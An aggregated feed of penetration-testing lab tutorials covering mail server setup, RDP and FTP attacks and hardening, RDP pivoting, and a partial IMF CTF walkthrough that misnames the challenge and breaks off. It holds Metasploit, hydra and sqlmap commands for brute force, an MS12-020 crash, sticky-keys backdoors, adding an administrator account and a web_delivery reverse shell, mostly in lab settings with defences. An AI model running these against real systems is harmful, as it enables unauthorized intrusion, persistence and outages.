Quantcast
Channel: Hacking Articles|Raj Chandel's Blog
Viewing all 1812 articles
Browse latest View live

How to Setup Mail Server for Penetration Testing using hMail

$
0
0
SMTP stands for simple mail transfer protocol communication between mail servers uses TCP port 25Mail clients on the other hand; often submit the outgoing emails to a mail server on port 587. For retrieving messages, client applications usually use either IMAP or POP3.

POP3 stands for Post Office Protocol (POP) is an application-layer Internet standard protocol used by local e-mail clients to retrieve e-mail from a remote server over a TCP/IP connection. It uses port 110 for receiving mail

IMAP stands for Internet Message Access Protocol (IMAP) is also an Internet standard protocol used by e-mail clients to retrieve e-mail messages from a mail server over a TCP/IP connection. It uses port 143 for receiving mail

Lets strat!!

Configure static ip in your network for SMTP server as shown below.


Download hmailserver and install it in your system (windows). This installation program will create a hmailServer user with administration rights. Here you need to give password for admin so that you will be able to manage its installation.






You can take help of nmap to ensure whether SMTP with other Service such as IMAP and PoP3 has been running successfully on remote system (192.168.1.104).
Nmap 192.168.1.104
From given image to you can observe that all three services SMTP PoP3 IMAP are running on port 25 110 and 143 respectively.
Also new port 587 will get open for submission (SMTP outgoing mail).


After login into hmailserver it will ask to add domain name therefore click on ADD domain.

Enter the domain name of your choice such as pentestlab.localand click the check box for Enable.
Now at last click on save which will create a domain “pentestlab.local” into hailmail server.


From given image you can observe pentestlab.local had been created on the left panel. After then click on Account in order to create a new user for your mail server.
Click on ADD

Now follow the given below step to create a user for your own mail server.
Address: username (info)
Password: Give password for username
Click the check box for Enable
Click on save
Repeat the step to create more users for mail server.


From given image you can see I had created three users and for mail server at least you should create two accounts, one account for sender and other for receiver.


Select all three protocols SMTP, POP3, IMAP as show in image.

Click on SMTPgiven in left panel select Advance option and type your IP “192.168.1.104” to bind your local IP with mail server.


After than select Advance option in left panel and type you’re your domain name (for example pentestlab.local) as default domain and click on save.


Select Auto-ban under Advance given in left panel. Uncheck Enable for auto-ban.


Now open host file from given path system32 > drivers > etc > hosts
Edit your IP (192.168.0.104) with domain name (penetstlab.local) as shown in given image.


Now use two different systems in your local network for sending mail through them.

System 1st

Open Microsoft outlook and select option Add account.
Click the radio button for “Manual setup or additional server type”
Click on next.


Click the radio button to choose service for IMAP or pop Click on next.


Enter the information of mail server for setting your account as given below:
User information
·         Your name: info
·         You email: info@pentestlab.local (provide an email id which you have created in hmail server account.)
Server information
·         Account type: pop3
·         Incoming mail server:  192.168.0.104
·         Outgoing mail server: 192.168.0.104
Logon information
·         Username: info@pentestlab.local
·         Password:******


Click on more settingand choose option outgoing serverand enable following services:
·         Use same setting (smtp) requires authentication
·         Use same setting as  my incoming mail server

Click on OK

In order to verify server setting for account click on “Test on Account Setting”
From given image you can observe it is showing green ticks for both tasks with status “completed”. It will show status “fail” if it found any error in account setting.


System 2nd
Open Microsoft outlook and select option Add account and repeat above step for mail server account setting.
Note: now you’re having two different accounts on two different systems in same local network as sender and receiver.

Now we are testing our mail server by sending mail from one system to another with different account.

Here we are Sending message from system 1st to 2nd through Microsoft outlook. You can use another method also for account setting and sending mail for example Thunderbird.


Open raj account of 2nd system and verify whether user received any mail form send info or not. Form given image can see we have successfully received mail in raj account.

In this way you can configure your own mail server for local network.


Penetration Testing on Remote Desktop (Port 3389)

$
0
0
In this article we are discussing Remote Desktop penetration testing in four scenarios. Through that we are trying to explain how an attacker can breach security in different- different scenario and what types of major step should take by admin while activating RDP services to resist against attack.

Remote Desktop Protocol (RDP) also known as "Terminal Services Client" is a proprietary protocol developed by Microsoft, which provides a user with a graphical interface to connect to another computer over a network connection. RDP servers are built into Windows operating systems; by default, the server listens on TCP port 3389.  

For more details visit Wikipedia.org

Let’s starts!!!


Suppose admin has allowed remote desktop service in his system for local network connection.


Scanning RDP with nmap

Attacker may take help of nmap to verify whether port 3389 is activated or not. For RDP penetration we are also using nmap in order to scan targeted system (192.168.0.102) for open RDP port.
Nmap-p 3389 192.168.0.102


If remote desktop service is allowed then nmap will show OPEN as state for port 3389, as shown in given image.

 Brute force attack on RDP

In order to connect with RDP we always need login credential as authenticated connection. A valid user can enter his username and password but an invalid user (attacker) cannot able to guess correct credential for login therefore they retrieve credential through brute force attack.

We are using hydra to demonstrate brute force attack on RDP.

Hydra: It is a parallelized login cracker which supports numerous protocols to attack. It is very fast and flexible, and new modules are easy to add. This tool makes it possible for researchers and security consultants to show how easy it would be to gain unauthorized access to a system remotely.

Open terminal in your kali Linux and type following command:
Hydra –v –f -l ignite-l ignite-P /root/Desktop/dict.txt rdp://192.168.0.102

From given below image you can read the username: ignite and password: 123456 which we have retrieve through brute force attack on port 3389.

Using this credential attacker can login for Remote Desktop service.


Add Security Policy against brute force

Admin can protect their network from brute force attack using Account lockout policy. Configure following policies under Security setting > Account policies > Account lockout policies

Account Lockout duration: Policy which defines the time period that a locked out account remains locked until become automatically unlock by itself or reset by admin. It will lock the account for specified time when user will cross the login attempt set by account lockout threshold.

Account lockout threshold: Policy which defines the number of fail logon attempt and will lock account for some period of time specified by Account lockout duration. It will allow maximum number of specified attempts for sing-in into your account.

Rest Account lockout counter after: Policy which defines the time period that must elapse after a failed logon attempt. The reset time must be less than or equal to the Account lockout duration.


Account Lockout duration: 30 minutes
Account lockout threshold: 2 invalid logon attempts
Rest Account lockout counter after: 30 minutes

 If the number of attempts is greater than the value of Account lockout threshold, the attacker could potentially lock every account.


Now let’s test Account lockout policy by again making brute force attack on port 3389.

hydra-v-f-l ignite-l ignite-P /root/Desktop/dict.txt rdp://192.168.0.102

When attacker retrieves the username and password, he will surely use them for login but as you can see it took more than 2 attempts to crack the password therefore according to set policies the account should be get locked for 30 minutes.


Let’s assure it by login into remote desktop

Open the terminal and type “rdesktop 192.168.0.102 ” when you will get target screen, enter username and password which have retrieve from brute force.

From given image you can observe that we have entered above discovered username and password ignite: 12345.



When you (attacker) will submit your credential then it will give you a message that current account has been locked out and cannot be logon as shown in given image.

This will lock the account of the user ignite for 30 minutes and hence admin will come to know that someone has tried brute force attack for unauthorized access.

In this way we can protect brute force attack for unauthorized access.


Scan port 3389 for DOS attack

Many times in order to identify whether host is vulnerable to RDP or not, attacker use exploit MS12-020-check to test its strength.
Open the terminal in your kali Linux and Load metasploit framework now type following command to scan for vulnerability.

use auxiliary/scanner/rdp/ms12_020_check
 msf auxiliary(ms12_020_check) > set rhosts 192.168.0.102
msf auxiliary(ms12_020_check) >set rport 3389
msf auxiliary(ms12_020_check) > exploit

From given image you can it is showing target is vulnerable, now you can use Google to find its exploit for attack.


Once attack knows that target port 3389 is vulnerable MS12-020-check then he will surly try to make an attack with Ms12-0200maxchannelids. This will launch a DOS attack on target system.

Now Type following command for DOS attack which will crash the system.

use auxiliary/dos/windows/rdp/ms12_020_maxchannelids
msf auxiliary(ms12_020_maxchannelids) > set rhost 192.168.0.102
msf auxiliary(ms12_020_maxchannelids) > set rhost 3389
msf auxiliary(ms12_020_maxchannelids) > exploit


From given below image you can notice the target is system is being shutting down due some problem.

Criminal executor of DoS attacks often target sites or services hosted on high-profile web servers such as banks or credit card payment gatewaysto make a machine or network resource unavailable to its intended users by temporarily or indefinitely disrupting services of a host connected to the Internet.


Enable RDP in Victims PC (2ndScenario)

If attacker has hacked victim system in which RDP service is  not enable then attacker himself can active this service using post exploitation module built by Rapid 7 inside metasploit.

Now to perform this we must need a meterpreter session of target system. From given image you can notice that have already meterpreter session of target system.

Here we have meterpreter session 1 through multi handler and session 2 from bypassuac for admin privileges.


Now type following command for generation post exploitation to enable RDP service.

use post/windows/manage/enable_rdp
msf post(enable_rdp) > sessions
msf post(enable_rdp) >exploit


This module makes it possible to apply the 'sticky keys' hack to a session with appropriate rights. The hack provides a means to get a SYSTEM shell using UI-level interaction at an RDP login screen or via a UAC confirmation dialog.

use post/windows/manage/sticky_keys
msf post(sticky_keys) > sessions
msf post(sticky_keys) >exploit


Now connect with remote desktop using following command:
rdesktop 192.168.0.102


It will ask to submit the credential for login but we are not aware of it therefore we had lunched stick key attack above so that we can access victim command prompt by hitting 5 times shift key as shown in given image.


Another way to enable RDP

When you are holding meterpreter session of victim’s system type following command which enable RDP service moreover set credential of your own choice.

Meterpreter> run getgui-e-u raaz-p 1234

From given image you can observe it has edited user raaz with password 12345 into “Remote Desktop Users” and in “Administrators”.  Now you can login with created user, connect with remote desktop using following command:

rdesktop 192.168.0.102


Enter username: raaz and password: 1234 for login.


Awesome!!! We had successfully login into remote system.


Port Forwarding (3rdsenario)

You can forward port 3389 on another port for increasing system security although to perform this in your window operating system explore following location through registry editor.

Computer\HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp

From given image you can see in the right panel port number is heighted, Click on it. 


Shift Port from 3389 to specific port number

You will get an edit DWORD window where that you can edit 32 bit value. By default it will show d3dwhich is hexadecimal value for 3389.
Replace 3389 value from another value of your choice such as 3314 and select hexadecimal as base which will convert 3314 into cf2.


From given image you can see port 3314 is open now.


Secure RDP through window firewall (4th Scenario)

Open window Firewall with Advance settings then move into its inbound rules and explore Remote Desktop (TCP-In) for domain profile for adding security filter by making some change in firewall setting.


Allow traffic from specific IP

After that it will open a window for changing its properties, click on scope. Here you will get two panels for type of connection establishes local and remote IP address. 

In remote IP address choose 2nd option for specific IP address and enter an IP to which you want to allow for connecting remote desktop services as shown in given image.

It will stop all traffic coming from another IPs and increase the security of your network against any kind of attack.


FTP Penetration Testing on Windows

$
0
0
Hello friends today we are sharing tips and tricks on FTP attacks and security through FTP penetration testing which will help to secure your server from any kind FTP attack.
FTPstand for File Transfer Protocol used for the transfer of computer files such as docs, pdf, multimedia and etc between a client and server on a computer network via port 21. Port 21 is default port which gets open when FTP is activated for sharing data.
Let’s start!!
Install & Configure FTP Server on Windows 7

Firstly we are going to setup an FTP server on our Windows 7 for sharing file in a LAN. In order to accomplish that we are going to open Control Panel>Programs>Programs and Features>Turn Windows features on or off as shown below.

Here Expand Internet Information Services and check the FTP Server option.
Also, ensure that FTP Extensibility and FTP Serviceare both checked as show below and click OK to begin Installation.
This Installs the IIS and FTP Service Manager, be Patient it might take some time.


Configure FTP Site in IIS

Now to open IIS, we will open Control Panel after then open System and Security and here we will open Administrative Tools. In Administrative Tools you will find IIS Manager as shown below, open it.


The new window of Internet information IIS Manager will come up; right-click Sites given in left panel under Connections, select Add FTP Site.
This will open a new window as shown below.

Enter the name of your FTP site of your choice, as shown in given image ignite.
Enter the path to the FTP folder you want to use to send and receive files. In our case, we created a folder named ftp in location C:\ftp.
And click next.


Allow following setting in Authenticationand Authorization for your FTP site and then click on Finish.
Authentication:Basic
Authorization:specific users (pc7)
Permission:read and write


Binding and SSL Settings, we will bind our IPv4 address to the server by allowing following setting then click on next.
·         Enter IP: 192.168.1.128 and Port: 21.
·         Enable the check box for Start FTP site automatically
·         In SSL option select No SSL and click next.


From given image you can see we had successfully configure FTP server for Ignite. Now let’s try to connect with it for sharing files.


Connect client to FTP Server through WinSCP

WinSCP is free software which is used to access the ftp server. You can download it from here.
Protocol to: FTP
Encryption To: No Encryption
Host name: IP of the FTP Server
Port: 21
Username and Password: Windows login credentials of the user.
Click on login


As you can see I have successfully connected to my ftp server which have a file called demo.txt.


Scanning FTP with nmap
Attacker may take help of nmap to verify whether port 21 is activated or not. For FTP penetration, we are also using nmap in order to scan targeted system (192.168.1.128) for open FTP port.
nmap -p 21 192.168.1.128
If file transfer service is allowed then nmap will show OPEN as state for port 21, as shown in given image.


Version Enumeration on FTP
Now, let’s try to get the FTP version through ftp_version on Metasploit
Open the terminal in your kali Linux and Load metasploit framework now type following command to scan for FTP version.
use auxiliary/scanner/ftp/ftp_version
msf auxiliary(ftp_version) > set rhosts 192.168.1.128
msf auxiliary(ftp_version) > exploit
From given image, you can it is showing target is vulnerable. So, let’s protect it.


Hiding Banner
Open IIS Manger.
Click on Features View given in bottom of window.


A new window for FTP messages will come up where you can change Message Behavior.

·         Enablesuppress default banner
·         Enable Show detailed messages for local request

Now let’s check if our FTP version is still visible or not.


You can verify it by executing following command in kali Linux for NMAP version scan.
nmap -p 21 -sV 192.168.1.128
As you can see that our FTP version is no longer visible to anybody.


FTP Brute force Attack
Let’s try to make Brute force attack on our FTP Server using Metasploit.
Open the terminal in your kali Linux and Load metasploit framework now type following command to Brute force FTP login.
use auxiliary/scanner/ftp/ftp_login
msf auxiliary(ftp_login) > set rhosts 192.168.1.128
msf auxiliary(ftp_login) > set user_file /root/Desktop/user.txt
msf auxiliary(ftp_login) > set pass_file /root/Desktop/pass.txt
msf auxiliary(ftp_login) > set stop_on_success true
msf auxiliary(ftp_login) > exploit

From given image you can observe that our FTP server is not secure against brute force attack because it is showing matching combination of username and password for login. So let’s protect our FTP server against Brute force.


Secure FTP server against Brute Force Attack
Open IIS Manager
Now open FTP IPv4Address and Domain Restrictions. Here we are going to allow only a particular IP address to access the FTP server. This will allow only valid IP to get connect with FTP.


Allow specific IP to connect FTP
Now following given below step:
·         Click on FTP IPv4 Address and Domain Restrictions
·         Click on Add Allow Entry from the Actions Tab in right panel
·         Select Specific IP Address and enter the IP address
·         Click OK

Here you can also add range of IPs of your network.


Restrict IPs to connect FTP
Now repeat the step with some changes to restrict other IPs for denying to access FTP services. 
Now following given below step:
·         Click on FTP IPv4 Address and Domain Restrictions
·         Click on Add deny Entry from the Actions Tab in right panel
·         Select Specific IP Address and enter the IP address
·         Click OK

Hence if any other user or attacker finds out credential for ftp login he cannot able to connect with server.


Let’s verify above setting by Brute force again in the same way we did before. From given image you can observe though it is showing incorrect combination for correct credential also.


FTP Port Forwarding
You can forward port 21 on another port for increasing server security although to perform this you need to open IIS



Now click on the Bindingson Actions Tab.
It will open a window as shown below where it is showing that FTP service is activated on port 21, now click on edit to replace this port into another.


From given image you can see we have are now using port 5000 for FTP services.


Now let’s check using nmap
nmap -p 5000 -sV 192.168.1.128
As you can see the FTP service have been shifted to port 5000


Now to verify if the service is actually running on port 5000 let’s login into FTP server using WinSCP and this time using port 5000 as shown below


Great!!! We are successfully connected with FTP server via port5000


FTP Log Monitoring  
In IIS Manager we can also manage Logs of our FTP Server.
Here, we can Schedule the Logging and also manage the size of logs and Location of Logs
For monitoring ftp log follow given below steps:

Open FTP Logging in the Features View.
·         Format of log file: click on W3C field and then select desired option such as date, time, client IP and etc.
·         Directory:browse a location where you want to save the logs
·         Schedule:Daily


Now if you want to view logs of FTP server you can open the directory which you have browsed for saving logs i.e. C:\inerpub\logs\Logsfiles
From given below image you can observe logs for FTP login.





FTP Penetration Testing in Ubuntu

$
0
0
Welcome to Internal penetration testing on FTP server where you will learn FTP installation and configuration, enumeration and attack, system security and precaution.  As you know that File Transfer Protocol (FTP) used for the transfer of computer files between a client and server in a network via port 21.

Let’s start!!!

Requirement
FTP Server: ubuntu
Attacker system: Kali Linux
Client system: window

FTP Installation

Vsftpd stand for Very secure FTP daemon is an FTP server for Unix-like systems, including Linux.
Let’s start by typing following command to install vsftpd for FTP service.
apt-get install vsftpd

This will start FTP service on port 21

FTP Scanning

Scanning plays an important role in penetration testing because through scanning attacker make sure which services and open ports are available for enumeration and attack.

Here we are using nmap for scanning port 21. 

Nmap -p 21 192.168.0.106

If service is activated in targeted server then nmap show open STATE for port 21.


Anonymous Login

FTP users may authenticate themselves with a clear-text sign-in protocol, normally in the form of a username and password, but can connect anonymously if the server is configured to allow it.

If anonymous login is allowed by admin to connect with FTP then anyone can login into server. An attacker can easily search for anonymous login permission using following metasploit exploit.  

use auxiliary/scanner/ftp/anonymous
msf auxiliary(anonymous) >set rhosts 192.168.0.106
msf auxiliary(anonymous) >exploit

From given image you can observe that it is showing permission READ from FTP server.


 Connect client to FTP Server through WinSCP

Now let’s ensure whether we can connect to FTP server as anonymous user or not.
Protocol to: FTP
Encryption To: No Encryption
Host name: IP of the FTP Server
Port: 21
Username and Password: anonymous: anonymous.
Click on login


Ohh!! Great, we have got FTP access through anonymous user.

Similarly an attacker can also get access of your FTP server therefore it is quite important for admin that he should not give any permission to anonymous user for login into server. 


Disable Anonymous Login
Again in order to secure your server from anonymous user login then follow given below steps:
·         Open vsftpd.conf
·         Set  anonymous enable = NO
·         service vsftpd restart


Now repeat the attack to verify for anonymous login permission using metasploit as above. But this time exploit will fail to take out information of anonymous user login permission which you can confirm from given below image.


Enumerating FTP Banner
An attacker always perform enumeration for finding important information such as software version which known as Banner Grabbing and then identify it state of vulnerability against any exploit.

Open the terminal in your kali Linux and Load metasploit framework; now type following command to scan for FTP version.

use auxiliary/scanner/ftp/ftp_version
msf auxiliary(ftp_version) > set rhosts 192.168.0.106
msf auxiliary(ftp_version) > exploit

From given image you can read the highlighted text which is showing vsftpd 3.0.2 is the installed version of FTP on target’s system.


While connected with telnet again anyone can identify installed version of FTP as shown image given image.
telnet 192.168.106 21
Once attacker enumerated FTP banners then he will surly Google for its vulnerability against any exploit, therefore admin should keep the banner hidden.

As we had discussed above how a banner grabbing can expose loopholes of any software or service running on remote system therefore after installing any service always hide their software versions.

Admin should make following changes in their configuration file to prevent banner information.

·         Open vsftp.conffile
·         Enable the comment “ftp_banner=Welcome to blah FTP service” by removing # from front of it.


Now save the whole text file after modification as shown in given image. Now it will not disclose banner information. Now restart the service using following command.
service vsftpd restart
Nmap –p 21 -sV 192.168.0.106

Wonderful!! We are successful in hiding banner which you can confirm from given image.


Though admin has hide the banner and disabled anonymous user but still attack has potential to steal credential for unauthorized access.

An attacker can take help of sniffing tools which can sniff the data packet travelling between server and client in a network and retrieve credential, this is known as sniffing, after then use them for unauthorized access. As we have discussed above FTP users may authenticate themselves with a clear-text sign-in protocol forusername andpassword.

Similarly we had captured TCP packet through wireshark for sniffing FTP credential, from given image you can observe User: raj and password: 123 had login successfully.


Use SSL Certificate to prevent Credential stealing
SSL stands for Secure Sockets Layer, the protocol which provides secure, encrypted communications between server and client, this encrypt data packet travelling between server-client networks.

Although attacker can sniff network data packet but will be not able to read fetched information because entire data will show in the form of cipher text.

Here administrations need to generate their own SSL certificate for secure authentication. Make the directory where the SSL certificate keys will be stored.

mkdir /etc/ssl/certificates


Type following command which generate a SSL certificate inside certificates directory using rsa: 2048 encryption valid for 365 days.
openssl req -x509 -nodes -days 365 -newkey rsa:2048 -keyout /etc/ssl/certificates/vsftpd.pem -out /etc/ssl/certificates/vsftpd.pem
For generating new private key it requires information such as Country name, state, email address and etc as shown given below image.


Now we need to open vsftpd.conffile for changing default setting by adding few line at the end of file.
rsa_cert_file=/etc/ssl/certificates/vsftpd.pem
rsa_private_key_file=/etc/ssl/certificates/vsftpd.pem
ssl_enable=YES
allow_anon_ssl=NO
force_local_data_ssl=YES
force_local_logins_ssl=YES
ssl_tlsv1=YES
ssl_sslv2=NO
ssl_sslv3=NO
require_ssl_reuse=NO
ssl_ciphers=HIGH

You can confirm it as shown in given image now save the changes and restart the service.
service vsftpd restart


Establish TSL/SSL connection with FTP through WinSCP
Now let’s ensure whether we can connect to FTP server as anonymous user or not.
Protocol to: FTP
Encryption To: TSL/SSL Explicit encryption
Host name: IP of the FTP Server
Port: 21
Username and Password: raj: 123
Click on login


Now server will send certificate to authorized user click on yes to store certificate and continue the encrypted connecting.


If attacker will sniff network packets he will get cipher text as shown in given image. In this way we can prevent sniffing from stealing credential in any network.


 FTP Brute force Attack
Another way to steal credential is Brute force attack on FTP Server using Metasploit.
Open the terminal in your kali Linux and Load metasploit framework now type following command to Brute force FTP login.
use auxiliary/scanner/ftp/ftp_login
msf auxiliary(ftp_login) > set rhosts 192.168.1.128
msf auxiliary(ftp_login) > set user_file /root/Desktop/user.txt
msf auxiliary(ftp_login) > set pass_file /root/Desktop/pass.txt
msf auxiliary(ftp_login) > set stop_on_success true
msf auxiliary(ftp_login) > exploit
From given image you can observe that our FTP server is not secure against brute force attack because it is showing matching combination of username: raj and password: 123 for login.

 Once attack steals your username and password, he try to login into server as authorized user and then can perform mischievous action such as steal your important data or replace with malicious file.
Bravo!! You can observe that using raj: 123 we had login successfully
Hence our server is not secure against such kind of attack so let’s protect our FTP server.

Here admin can set iptable chain rules for certain number of login attempts and if user crossed the define number then account will get locked for some time period as specified by admin.
Type the given below command to set iptable chain rule for account lockout policy:
iptables -I INPUT -p tcp --dport 21 -i eth0 -m state --state NEW -m recent --set
iptables -I INPUT -p tcp --dport 21 -i eth0 -m state --state NEW -m recent  --update --seconds 120 --hitcount 3 -j DROP

Now this above rule will allow only 3 chances for login into FTP server otherwise locked the account for 120 seconds (2 minutes).

service vsftpd restart


Let’s ensure iptable chain rule working by making brute force attack as above.
Great!! It has prevented by stopping brute force after 3 attempts but will get activated after 2 minute therefore admin should locked the account for long period of time.


Admin can take help vsftpd.logto view client IP who try to connect with vsftpd server.
cd /etc/vsftpd.log
tail vsftpd.og


Now open hosts.allow file from inside /etc to allow valid user to connect with server securely through specific IP.
At the end of text file enter specific IP to whom you want to give permission for establishing connection as shown in given image.

Vsftpd: 192.168.0.104


It quite important that admin should restrict all IPs other than allowed IP (192.168.0.106) to protect network from establishing connect from unknown IP.
Open /etc/hosts.deny and specify list of hosts whom you want don’t to allow accessing into the system.
Vsftpd: All


Now open configure file of vsftpd and add following lines:
# TCP Wrappers
Tcp_wreappers= Yes

Restart the service vsftpd “service vsftpd restart”


When valid user try to connect with another IP then server will not allow established connection as shown in given image.


FTP Port forwarding
As we know port 21 is use as default port for FTP service therefore we can also secure port from 21 to another port.

Open vsftpd.conffile and follow given bellow steps:

·         Disable connect from port 20=N0
·         Add listen_port=5000   
·         service vsftpd restart




Great!!! We are successfully connected with FTP server via port 5000 in this way internal penetration testing helps us in system and network security.

Note: Always restart the vsftpd service after making any changes in its configuration file.

RDP Pivoting with Metasploit

$
0
0
In our previous turtorial we had discussed on SSH pivoting and today we are going to discuss RDP pivoting.

Pivoting is technique to get inside an unreachable network with help of pivot (centre point). In simple words it is an attack through which attacker can exploit those system which belongs to different network. For this attack, the attacker needs to exploit the main server that helps the attacker to add himself inside its local network and then attacker will able to target the client system for attack.

Lab Setup requirement:
Attacker machine: Kali Linux
Pivot Machine (server): window operating system with two network interface

Target Machine (client): window 7 (Allow RDP service)


Use exploit MS17-010 or muti handler to hack the pivot machine and bypass its UAC to achieve admin privleges.
Sessions
 Hence if you will count then currently attacker has hold 2 sessions, 1st for meterpreter shell and 2nd for bypass UAC of server.


Check network interface through following command:
Meterpreter> ifconfig
From given image you can observe two networks interface in victim’s system 1st for IP 192.168.0.27 through which attacker is connected and 2nd for IP 192.168.100.100 through which clients (targets) are connected.


Since attacker belongs to 192.168.0.1 interface and client belongs to 192.168.100.0 interface therefore it is not possible to directly make attack on client network until unless the attacker acquires same network connection. In order to achieve 192.168.100.0 network attacker need run the post exploitation “autoroute”.
This module manages session routing via an existing Meterpreter session. It enables other modules to ‘pivot’ through a compromised host when connecting to the named NETWORK and SUBMASK. Autoadd will search a session for valid subnets from the routing table and interface list then add routes to them. Default will add a default route so that all TCP/IP traffic not specified in the MSF routing table will be routed through the session when pivoting.
msf > use post/multi/manage/autoroute 
msf post(autoroute) > set session 2
msf post(autoroute) > exploit
Note: If you had not bypass UAC you can use session 1 for post exploit


This Module will perform an ARP scan for a given IP range through a Meterpreter Session.

 use post/windows/gather/arp_scanner
msf post(arp_scanner) > set rhosts 192.168.100.100-110
msf post(arp_scanner) > set session 2
msf post(arp_scanner) > set thread 20
msf post(arp_scanner) > exploit

Here we found a new IP 192.1668.100.103as shown in given image. Let’s perform TCP port scan for activated services on this machine.


This module Enumerates open TCP services by performing a full TCP connect on each port. This does not need administrative privileges on the source machine, which may be useful if pivoting.

use auxiliary/scanner/portscan/tcp
msf auxiliary(tcp) > set ports 445, 3389
msf auxiliary(tcp) > set rhosts 192.168.100.103
msf auxiliary(tcp) > set thread 10
msf auxiliary(tcp) >exploit
From given you can observe port 3389 and port 445 are open and we know that 3389 is used for RDP and 445 is use for SMB.


This module will test a SMB login on a range of machines and report successful logins. If you have loaded a database plugin and connected to a database this module will record successful logins and hosts so you can track your access.

use auxiliary/scanner/smb/smb_login
msf exploit (smb_login)>set rhost 192.168.100.103

msf exploit (smb_login)>set user_file  /root/Desktop/user.txt
msf exploit (smb_login)>set pass_file /root/Desktop/pass.txt
msf exploit (smb_login)>set stop_on_success true
msf exploit (smb_login)>exploit

From given image you can observe the highlights pentest: 123 has success login.


Now Type following command for port forwarding on localhost.

Meterpreter> portfwd add –l  3389 –p 3389 –r 192.168.100.103

-l: This is a local port to listen on.
-p: The remote port to connect on.
-r:  The remote host address to connect on.


Now type following command to connect RDP client on localhost through port3389
Rdesktop 127.0.0.1:3389


Now it will ask to enter the credential for connecting with RDP client; Enter the combination of username and password you have retrieved from SMB login Exploit.
If you remembered we have retrieved pentest: 123 through smb login exploit which we are using for login.


Wonderful!! We had successfully exploit RDP client.

Step by Step SMTP Lab Setup in Ubuntu

$
0
0
From Wikipedia
Hello friends! Today we are discussing “configuration of SMTP mail server” for sending mail in your LAN network.  
SMTP stands for simple mail transfer protocol communication between mail servers uses TCP port 25 Mail clients. For retrieving messages, client applications usually use either IMAP or POP3.

POP3 stands for Post Office Protocol (POP) is an application-layer Internet standard protocol used by local e-mail clients to retrieve e-mail from a remote server over a TCP/IP connection. It uses port 110 for receiving mail.

IMAP stands for Internet Message Access Protocol (IMAP) is also an Internet standard protocol used by e-mail clients to retrieve e-mail messages from a mail server over a TCP/IP connection. It uses port 143 for receiving mail.

Let’s start!!

Add Hostname and domain

With root privilege open hosts file for adding hostname and Domain name through following command:

Now add given below line in host file and then save it.

127.0.0.1 mail.ignite.lab ignite


sudo gedit /etc/hostname

Now re-write the default hostname as “ignite” which we have mention in host file also, as shown in given image and save it.


Now restart the machine after making changes in hosts file and hostname.
sudo reboot
Now check hostname and domain by typing following command and assured the changes you had made.
hostname
hostname -f

Install Postfix
Postfix is the default Mail Transfer Agent (MTA) for Ubuntu. It is in Ubuntu's main repository, which means that it receives security updates. This guide explains how to install and configure postfix and set it up as an SMTP server using a secure connection.

sudo apt-get install postfix


A dialog box will pop for Postfix Configuration where you have to select Internet site as general type of mail configuration as shown in given image.


Enter Domain name (mail.ignite.lab) which you have save inside host file for system mail name and click on OK.


Postfix Configuration Setting
Open main.cf file and make following changes in this then save it.
·         Add subnet IP mynetworks = 127.0.0.0/8  192.168.1.0/24
·         Enter inet_protocols = ipv4
·         Add new line home_mailbox = Maildir/




Now Type following command to view the list of open port to listen for incoming connections.

-t: for TCP ports
-n: for network
-l: forlist

From given image you can observe that STATE of port 25.


Install Dovecot
Dovecot is a Mail Delivery Agent, written with security primarily in mind. It supports the major mailbox formats: mbox or Maildir. This section explains how to set it up as an imap or pop3 server.





Another POP up will ask hostnamethat will be used in ssl certificates. Enter your doamin name as shown in given image and click on OK.


Dovecot configuration setting
Open 10-auth.conf file through given below path:

Now make following changes in this as shown in given image then save it.
disable_plaintest_auth = yes



change auth mechanisms = plain login


Now make following changes in this as shown in given image then save it.
mail_location=  maildir:/home/%u/Maildir


Open 10-master.conf file through given below path:
Enable port =143


Enable port = 110


Give permission for unix_listener auth-user db
Mode = 0600
User = postfix
Group = postfix


sudo service dovecot restart


Checkservice using netstat–tnl to view the list of open port to listen for incoming connections
From given image you can observe STATE LISTEN for port 110 and 143.


We have already a user: sr let’s configure a mail account for him by adding following information in given text field
·         Your name: sr
·         Email address: sr@mail.ignite.lab
·         Password: 1234 (user’s password)

Now click on continue then choose manual config tab.


Enter your network IP as server hostname (192.168.1.107) for incoming mail on port 143 and outgoing mail via port 25. Then click on done.


A new window will come up for security Exception click on tab Confirm security Exception given at bottom.


For sending mail we always need two users account one as sender another for receiver. Now type following command to add a new user.
adduser raj

Since we had already configure an account for user:sr in thunderbird , now create another mail account for usre:raj in thunderbird as created above.

Hence we are having two accounts in mail server for sending message
·         Sender:raj@mail.ignite.lab
·         Receiver:sr@mail.ignite.lab


Send mail using Thunderbird
Now write an Email from: sr@mail.ignite.lab to raj@mail.ignite.lab for testing mail server service as shown in given image. Click on send after typing message.


In this way you can configure your own mail server for local network.

Hack the IMF VM (CTF Challenge)

$
0
0
Hello friends! Today we are going to take another CTF challenge known as 6days. The credit for making this vm machine goes to “Geckom” and it is another CTF challenge where we have to find 6 flags to complete the challenge. You can download this VM here.
Let’s Breach!!!
Let us start form getting to know the IP of VM (Here, I have it at 192.168.0.25 but you will have to find your own)

netdiscover

Use nmap for port enumeration
nmap -sV  192.168.0.25

 We find port 80 is open, so we open it in our browser


We take a look at our source code and found a few javascript files that look like base64 encoded.
Inside the flag we find another base64 encode string, decoding it we find a string called imfadministrator.
We take a look around the website and in the source code of contact.php page we find our 1st flag.

Flag 1 contains a base64 encoded string decoding it we find a string called allthefiles.
We open allthefiles and imfadministrator on the browser. We find that imfadministrator is a directory that leads to a login page.

In the contact.php page we found a few email addresses so we use cewl to make a dictionary.
We use burpsuite to launch a dictionary attack. We select the position and change the password from string to array.

Now we find the third flag in our response.
Now that we can access the page we see that the page might be vulnerable to sql injection.

Using burpsuite we save the request in a text file.

We use sqlmap to dump the database.
sqlmap -r /root/Desktop/imf.txt --dbs --batch --dump-all


We find the name of the pages along with another page called tutorial-incomplete. We open it on our browser and find a page with QR-code inside an image.


When we decode the QR-code we our 4th flag.


Inside our flag we find a base64 encoded string, when we decode it we find a string called uploadr942.php         
We open it on our browser and find a page to upload a file.

Now while uploading a shell we find that it is protected from WAF, so we create a custom shell and save it as GIF file to bypass the WAF.


Now we upload the file and check the response from the server to find where our file is uploaded.


We find server sends a string in a comment, we find our file is in uploads folder and the comment in the response sent by server is the name of our file.

After finding our shell, we find 5thflag. Now we use web_delivery to take reverse shell using metasploit.


We setup our metasploit for web delivery and execute the command on our shell.


Now we have the reverse shell we take a look inside 5th flag


We find a base64 encode string when we decode it we find a string agentservices.
We check the connections of our server using netstat
Netstat –antp


We found a service running on port 7788, we use curl to find what the server is running on port 7788.
curl localhost:7788

